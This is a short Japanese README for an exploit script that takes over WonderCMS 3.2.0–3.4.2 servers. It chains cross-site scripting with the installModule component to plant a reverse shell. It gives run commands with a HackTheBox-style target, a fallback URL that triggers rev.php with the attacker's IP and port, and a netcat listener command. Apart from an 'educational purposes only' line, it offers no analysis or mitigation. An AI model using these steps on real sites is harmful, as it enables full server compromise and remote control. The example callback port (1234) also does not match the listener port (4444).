
Xss インジェクション、WonderCMS 3.2.0 -3.4.2
WonderCMS v3.2.0 - v3.4.2 は脆弱です。リモート攻撃者は、クロスサイトスクリプティング(XSS)エクスプロイトを使用してサーバーを完全に制御できます(教育目的のみ)。以下がその計画です:
このエクスプロイトは、WonderCMSのinstallModuleコンポーネントを悪用して、任意のコードを実行するように細工されたスクリプトを忍び込ませます。
python3 exploit.py <URL> <YOUR_IP> <YOUR_PORT>
例
python3 exploit.py http://sea.htb/loginURL 10.10.14.20 1234
リバースシェルが自動的にトリガーされない場合は、次のURLにアクセスしてください:
http://<TARGET_URL>/themes/revshell-main/rev.php?lhost=<YOUR_IP>&lport=<YOUR_PORT>
以下のコマンドでリスナーを起動することを忘れないでください:
nc -lvp 4444
prodigiousMindが脆弱性を発見・報告しました https://gist.github.com/prodigiousMind/fc69a79629c4ba9ee88a7ad526043413